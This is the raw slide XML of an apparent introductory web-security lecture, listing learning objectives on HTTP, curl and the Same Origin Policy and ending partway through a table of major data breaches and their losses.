            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="0"/>
            <a:ext cx="8153400" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By the end of today’s class, you will be able to: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A152DD-9925-6948-B278-55544873B24D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577516" y="1275347"/>
            <a:ext cx="8153401" cy="5539978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Discuss how the threat landscape due to web is growing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Explain the network structure of the internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Explain the components of HTTP requests and responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use the curl command to send HTTP requests via the command line and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>intepret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> the contents of the responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Distinguish between HTML, CSS, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> within the context of front-end resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Inspect the major features of an HTML document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Discuss Same Origin Policy and why it matters in a security context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use the Network Inspector tool to analyze requests and responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3368073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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="722446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DCB6DA8-3FE3-4E4F-B303-2BF3E0109B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65318"/>
            <a:ext cx="9144000" cy="5221082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01E15D96-2AA1-48C6-8D89-D22446D33BE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="5634335"/>
            <a:ext cx="8915400" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Threat Landscape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> due to the Web is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Growing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>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355004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228600" y="0"/>
            <a:ext cx="8737600" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Big Losses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F885ECAB-8A2B-4EA0-B5BD-DF93AEE3F89C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="990600"/>
          <a:ext cx="8458200" cy="4043680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3600344">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2630471500"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1100975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2449894073"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3756881">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="556959040"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Organization</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Year</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3382116621"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yahoo</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2013/14</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Billion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Users Compromised</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-$350 M </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Valuation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="266460537"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eBay</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2014</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>145 M </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Users Compromised</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="621176744"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Equifax</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2017</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>143 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Users’ PII Exposed</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>209,000</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> CC Numbers Leaked</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3208649475"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Heartland Payment Systems</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2008</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>134 M </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CC Numbers Leaked</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2397656858"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sony</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2011</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>77 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Accounts Compromised</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>$171</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> in Business Losses</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4276385289"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RSA Security</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2011</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>40 M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Employee Records Stolen</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2121378569"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Uber</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
